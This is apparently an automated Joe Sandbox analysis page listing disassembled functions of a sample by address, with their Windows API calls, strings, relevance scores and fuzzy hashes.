Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: a2547c3a1f1b4444127e9cbc729f9a2f553cecfbedb52ebbf3ab8bcd0c471410
Instruction ID: b2a2c2aad8eb5df292b954642dd35846e6a7f0676a5375d9bd872d0623616733
Opcode Fuzzy Hash: a2547c3a1f1b4444127e9cbc729f9a2f553cecfbedb52ebbf3ab8bcd0c471410
Instruction Fuzzy Hash: 1C218B72600209ABEF108FA5EC90EFB37ADEB58338F108629FA50D2190D771DC81B760

Function 00EF6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00EF6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EF6DEF
GetStdHandle.KERNEL32(0000000C), ref: 00EF6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EF6E3B

Strings

nul, xrefs: 00EF6E36

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 4d087a1d9fc691b9771287433928d30053629a99278cc1bcc4d00ee04d48b83c
Instruction ID: 94b479583488c00a1e53f1af80c8bea161e6b3df9443102d779cede3606bb55a
Opcode Fuzzy Hash: 4d087a1d9fc691b9771287433928d30053629a99278cc1bcc4d00ee04d48b83c
Instruction Fuzzy Hash: 0D21A47560020DABDB20AF29DC05AAA7BF4EF54724F204619FEA0F72D0D7719954DB50

Function 00EF6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00EF6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EF6EBB
GetStdHandle.KERNEL32(000000F6), ref: 00EF6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EF6F06

Strings

nul, xrefs: 00EF6F01

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 761e2149a20000dea79207098a24a45d311c98c9fb973533c951ff162259efb3
Instruction ID: 6f10912367cae4554d2c4513b4f04f5647ad4bd9e5d710df23b9ead52a006c4f
Opcode Fuzzy Hash: 761e2149a20000dea79207098a24a45d311c98c9fb973533c951ff162259efb3
Instruction Fuzzy Hash: 9021927A60030D9BDB209F69DC04ABA77E8AF55724F204A19FEE0E72D0E770A951CB50

Function 00EFAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EFAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EFACA8
__swprintf.LIBCMT ref: 00EFACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00F1F910), ref: 00EFACFF

Strings

%lu, xrefs: 00EFACBB

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: d14ab701081efdcb33de6b65fd176c5a36710006a7c50a43f75350685f0ed8e8
Instruction ID: 35ad643956281a44753145cddc1a42b8d187fa27ffb712e8ee4e8766090502d3
Opcode Fuzzy Hash: d14ab701081efdcb33de6b65fd176c5a36710006a7c50a43f75350685f0ed8e8
Instruction Fuzzy Hash: 10217171A0014DAFCB10DF69C945EEEBBF8EF89314B004069F909AB252DA71EA45DB21

Function 00EF1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EEFCED,?,00EF0D40,?,00008000), ref: 00EF115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EEFCED,?,00EF0D40,?,00008000), ref: 00EF1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EEFCED,?,00EF0D40,?,00008000), ref: 00EF118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00EEFCED,?,00EF0D40,?,00008000), ref: 00EF11C1

Strings

@, xrefs: 00EF119D

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @
API String ID: 2875609808-411606354
Opcode ID: 0011453b8a3de02b31e783c63b52fc879850272e470a5b933beb23dc62e10a35
Instruction ID: f4fb12d9cc32797d1dee4dfb21cc3e2ff78c53a485f7f8f2da22088238d46f05
Opcode Fuzzy Hash: 0011453b8a3de02b31e783c63b52fc879850272e470a5b933beb23dc62e10a35
Instruction Fuzzy Hash: 29113C31D02A2DE7CF009FA5D848AFEBBB8FF09711F415195EB85B2240CB709594DBA5

Function 00EF1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EF1B19

Strings

APPEND, xrefs: 00EF1B52
KEYS, xrefs: 00EF1B30
REMOVE, xrefs: 00EF1B1F
EXISTS, xrefs: 00EF1B41

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: f5cc076a15dd6629fc23fcfb52febc35de2b20ecc315ba058d6e2c8e0d413355
Instruction ID: fda51bbd1be6b5f14f0fe04a730cadd9bf4b5b00dc375e6a88fa582e70316123
Opcode Fuzzy Hash: f5cc076a15dd6629fc23fcfb52febc35de2b20ecc315ba058d6e2c8e0d413355
Instruction Fuzzy Hash: 33113C3191020DCBCF00EF64D8619FFB7B4BF25748B1494A9D81477292EB326906DB50

Function 00F0EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F0EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F0EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F0ED6A
CloseHandle.KERNEL32(?), ref: 00F0EDEB

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 23b558181b0d012c27443870e85d60e24131bfecae8c2786d161b167d5fdd37d
Instruction ID: 1e874909c560e12187039d93e22ca6c95d4a0142d66530a0601bd23ec6eee0ab
Opcode Fuzzy Hash: 23b558181b0d012c27443870e85d60e24131bfecae8c2786d161b167d5fdd37d
Instruction Fuzzy Hash: 968160716043009FDB24EF28C886F6AB7E5AF45720F14881DF999EB3D2D670AC40DB92

Function 00EB541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EB547B
_memcpy_s.LIBCMT ref: 00EB54ED
__read_nolock.LIBCMT ref: 00EB554B
__filbuf.LIBCMT ref: 00EB556E
_memset.LIBCMT ref: 00EB55B2

Part of subcall function 00EB8B28: __getptd_noexit.LIBCMT ref: 00EB8B28

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: 3e8a2e00e3e0f13eb31581394ec49279397e9130f5b23eb9c967d4aeb94d32fc
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 0F519572A01B05DBDB249EA9D8807EF77A6AF40325F249729F836B62D0D7719D908B40

Function 00F10037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Part of subcall function 00F10E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0FDAD,?,?), ref: 00F10E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F100FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F1013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F10183
RegCloseKey.ADVAPI32(?,?), ref: 00F101AF
RegCloseKey.ADVAPI32(00000000), ref: 00F101BC

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 129d17099a23869e123619ba6961eec4703744c37507d2a77a7318d9fc0c7dae
Instruction ID: e1537774375ecb2ea215d15f7eef172fee2d67287d979a3d942ae2e43a01ef81
Opcode Fuzzy Hash: 129d17099a23869e123619ba6961eec4703744c37507d2a77a7318d9fc0c7dae
Instruction Fuzzy Hash: 6E518F71608204AFDB04EF68CC81FAAB7E8FF84314F40491DF59597292DB75E988DB52

Function 00F0D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F0D927
GetProcAddress.KERNEL32(00000000,?), ref: 00F0D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00F0D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00F0DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F0DA21

Part of subcall function 00E95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EF7896,?,?,00000000), ref: 00E95A2C
Part of subcall function 00E95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EF7896,?,?,00000000,?,?), ref: 00E95A50

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 581817b9c1d3a4b69e110fecf5df194f2e62b91b9f0241c7720ce0edbdb0438f
Instruction ID: d4c72f962a9a5f13cd0bad05ff1f580bab1990c80ef34aff139201630fe41c23
Opcode Fuzzy Hash: 581817b9c1d3a4b69e110fecf5df194f2e62b91b9f0241c7720ce0edbdb0438f
Instruction Fuzzy Hash: 22511576A00209DFCB00EFA8C4859ADB7F5FF09320B158069E859AB352D735AD45EF91

Function 00EFE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EFE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EFE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EFE687

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EFE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EFE6B4

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 759168a0f4547af5437551d970bc3efa50cb76c6f7a46361ddc16ca1bf6db90c
Instruction ID: 6f9349037a16afbe34d96adb7b7e2cb0c68f0617f22c03610539cd20e994e874
Opcode Fuzzy Hash: 759168a0f4547af5437551d970bc3efa50cb76c6f7a46361ddc16ca1bf6db90c
Instruction Fuzzy Hash: EA511C35A00109DFCF15EF68C9819AEBBF5EF09314B1490A9E909BB362DB31ED11DB50

Function 00F1A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c91f811274e5ecac09244f8ebaf4290a21bab8ca65c791f37ab649d16527d15
Instruction ID: 98c05373775ec4b68bc494ed47d7099b5a8417c11db760a52b3122329388198c
Opcode Fuzzy Hash: 7c91f811274e5ecac09244f8ebaf4290a21bab8ca65c791f37ab649d16527d15
Instruction Fuzzy Hash: 2841B036D06208BFD721DB28CC58FE9BBA4AB09320F154165E916B72E1C730AD85FA51

Function 00E92344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00E92357
ScreenToClient.USER32(00F557B0,?), ref: 00E92374
GetAsyncKeyState.USER32(00000001), ref: 00E92399
GetAsyncKeyState.USER32(00000002), ref: 00E923A7

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: ecd9020dc32b3f00b6ca8164562eee511d57bad04573b5fec6dbffff5cb0bd5c
Instruction ID: c03b045372828a9e94627aa90054414cb8a2bdaad86f5f97aaa1a34d3166e1c7
Opcode Fuzzy Hash: ecd9020dc32b3f00b6ca8164562eee511d57bad04573b5fec6dbffff5cb0bd5c
Instruction Fuzzy Hash: 91418E3560410AFBCF19CF68CC45EE9BB75BB05364F20431EF928A22A0C7359994EB90

Function 00EE63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EE63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00EE6433
TranslateMessage.USER32(?), ref: 00EE645C
DispatchMessageW.USER32(?), ref: 00EE6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EE6475

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: a04d6f33b16ef6c38f5f1efc44fe83434e3112bd6ccfdc957c41720fe135f485
Instruction ID: 267ac1ccf060218f636182b2bf2bcd280e6c5ee9d1558070ec2114dbc37a50af
Opcode Fuzzy Hash: a04d6f33b16ef6c38f5f1efc44fe83434e3112bd6ccfdc957c41720fe135f485
Instruction Fuzzy Hash: E431023190078EAFDB24CFB2DC44BF67BA8BB20795F145165E531E60A1E7249889EB60

Function 00EE8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EE8A30
PostMessageW.USER32(?,00000201,00000001), ref: 00EE8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EE8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00EE8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EE8AF8

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: bad9441c16b4722206a3b5b232be354e6f8441934f071da2292fa8e10bda6c4f
Instruction ID: a8dccd0e7c15101d9da80cf232b4da949b65996430ee01ee046f86a8146d5376
Opcode Fuzzy Hash: bad9441c16b4722206a3b5b232be354e6f8441934f071da2292fa8e10bda6c4f
Instruction Fuzzy Hash: C231BC7150025DEFDB14CFA9DA4CADE3BB5FB04319F10822AF929EA2D1C7B09914DB90

Function 00EEB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00EEB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EEB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EEB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EEB27F
_wcsstr.LIBCMT ref: 00EEB289

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: b9b0c2daf49062e1e060424b3f13b958fb8584a60b1237676f66aa6a4e7738ec
Instruction ID: 7aa75fb3da0adc811afc2c4e04528bf735f9fa0ff1d1021a30b32bea6fc7f168
Opcode Fuzzy Hash: b9b0c2daf49062e1e060424b3f13b958fb8584a60b1237676f66aa6a4e7738ec
Instruction Fuzzy Hash: B821F9312042487BEB159B76DC49EBF7B9CDF49760F009139F905EA1B1EF61DC40A660

Function 00F1B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00E92612: GetWindowLongW.USER32(?,000000EB), ref: 00E92623

GetWindowLongW.USER32(?,000000F0), ref: 00F1B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F1B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F1B1CF
GetSystemMetrics.USER32(00000004), ref: 00F1B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F00E90,00000000), ref: 00F1B216

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 9327991d20c80a9551dd3c302f3518379264dd862f40f69499eb6eb8b79eef24
Instruction ID: 5ca4ced3d62807df9345dca165f49f24a8bfc75584273658c10d233cd8a6964a
Opcode Fuzzy Hash: 9327991d20c80a9551dd3c302f3518379264dd862f40f69499eb6eb8b79eef24
Instruction Fuzzy Hash: C9218D71A10655EFCB109F38DC18AAA3BA5EB05771F164728B922D71E0E7309895EB90

Function 00EE9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EE9320

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EE9352
__itow.LIBCMT ref: 00EE936A
